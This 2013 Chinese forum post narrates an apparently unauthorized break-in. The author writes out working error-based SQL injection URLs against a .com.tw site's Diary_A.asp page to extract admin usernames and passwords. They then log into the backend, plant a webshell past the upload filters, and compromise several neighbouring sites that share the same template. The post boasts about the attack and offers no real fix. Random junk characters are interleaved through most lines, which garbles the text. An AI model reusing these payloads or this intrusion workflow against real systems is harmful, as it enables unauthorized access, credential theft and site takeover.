发现一个注入点
% v( g7 R3 @1 m/ g% Shttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
- m+ w( @* [: ~4 a( x5 c7 ]) Q. I
习惯性的加’having1=1--1 Z+ B0 y$ a! J6 O& f) F
6 d" R/ s/ \, n* b; T" l6 ]9 ahttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—2 c0 {9 W& i2 U) R! z! E+ A
" w0 z z" i, W8 g; l0
" f3 g8 Z4 H1 |- f0 d2 n3 X& V2 M; C! N% y* M7 Y S- T
爆出Diary_A.dl_Title(这时候很激动啊)
5 m ]: S. [" e- e2 D& v2 _
! N4 t0 W5 J8 g3 i5 k那么继续* C! ^' ?$ Z! L$ [# m. [, Z
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
' `1 ^8 w8 \" q; }* `, K# s5 Y, f5 F
继续,一直爆下去
/ }, k7 r0 Z& A& h9 l& ]9 X8 z! i7 c3 G+ t* \) X
爆到几个字段和表段 但是没找到需要的管理用户的字段/ ?$ z" @! M" ~& b5 a4 M
n! J# M; m' g蛋疼了 怎么办 然后去后台登陆页看源码
- P* L# c. [, M' F% h
; W. n# R! A6 I: V00 R4 X( T$ Q6 s5 f0 j9 W& v r
. S7 L# u- y6 C; M" F. Z
Input name= “ADUID”4 O: o* r) f1 ?; I3 M4 p% ]! p
Input name= “ADPWD”
% _& {; Y$ {! i& a
i; n* `& n' l1 I5 O; z' F$ H$ S3 A很幸运 找到了字段那就继续# D; x5 f% Y( h' l
找到之后开始爆用户
+ B! C2 X. U1 z% ^6 H; ohttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—' l) w! S0 R4 S2 }' i% p! S9 \. B
爆密码9 h# T4 q" P% K) t+ L1 O# W
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—' A+ b5 `: ^3 N; l1 R0 x2 w
测试了下 这个注入点只能爆到文章哪里的表
8 Z3 D+ K$ S( y, N2 |0 L3 j
, ~# `* P" w% L$ L1 F头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了9 u7 ^) i2 j7 \4 F/ q9 N1 H6 m# V
9 q/ v9 N2 y: V7 g' D/ D( ]又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
! b8 e9 }7 x+ q: c* V9 [6 \) z
. d9 i* F- c7 G$ O/ f473
) ]& h7 V( [' k3 N
' j: Q% S4 v: e' D进后台2 L0 h& u4 ?. l. E x" m
4 |0 o0 m/ P. `) |: e
/ j7 a4 G5 [4 w7 b& s( _发现几个上传点 有的地方不能上传 而且防止恶意代码
. q( V5 v2 F- M$ v9 r- x2 ^! ?! V, f3 ^- m0 P* b
没办法 各种百度各种找大牛 找到一只好像可以突破的马8 m8 o' b( A. E. {4 J
9 G8 p' G2 L* S/ `9 @8 `: \* [; I
# y/ Q9 ^: ~+ b$ j% b
在系统管理那里直接上传 不过没有显示地址$ K7 G- T* A) ~& w5 U6 V
. I* |( Q/ a* x
再上传一次 抓包 搞定OK
: R# ^ T6 v2 q( a5 S9 H; ^
: F' M; D/ n# G2 ?+ a, K5 O/ a; M& |$ T( L' j7 R/ R
; J7 e7 V/ X! O1 T% O2 r
472
2 G3 z" \: g! V- C# b0 I! w1 x8 z+ H8 T9 L! n
晚上不行了 去睡觉。。。7 I: n7 F- u3 _6 R2 K1 i! y
第二天刚起床 闲的没事做继续日站吧 , u, o4 {% {! f$ w! D4 U4 T1 b
: ]5 R! ~) ]5 i7 ]+ |
找个站 就把这个站的旁c扫了下# `- t% E0 Z% I* V* k
2 \2 S" ?3 d5 g* s% L
发现c段也有一个购物站 ,然后还和这个站的模板差不多% V* L. L, J; X- k2 V/ \) f% a
7 C [& V, |' r/ L: z就找到会员登录口测试
# m5 S+ [/ O) q& U9 \% W! h8 \7 T2 n' j
'and (select top 1 MGR_UID from A_MGR)>0—4 w1 T2 N% R" P8 R
果断爆到了 这时候我很激动 通杀& s2 D. v z* |) f4 j' O, P
8 ]" f5 q) V& Y7 H. \+ l3 }
再次翻c段4 ^3 \- G4 u2 f, t- D
3 d/ P) ^) A; Z/ X _5 R
翻出几个站 都成功拿下# c+ N4 H" K& d; U
& M' q" |; \$ K* ^+ \- p! y, _- W5 o3 T- i# I x
. h2 k2 r! m! \! t: g0 |8 ^修复方案:( U. t) ~+ w9 A/ ^0 V4 [% A- _
他们比我专业
8 a) r9 S9 U& J4 m# s: f4 w- d/ v/ v5 T) a* P% W
- ~+ i; G' O/ H6 Q1 d. I% s# t
! g- A6 l: p) B" F5 ]5 y |
发表于 2013-4-4 17:40:38
收藏
支持
反对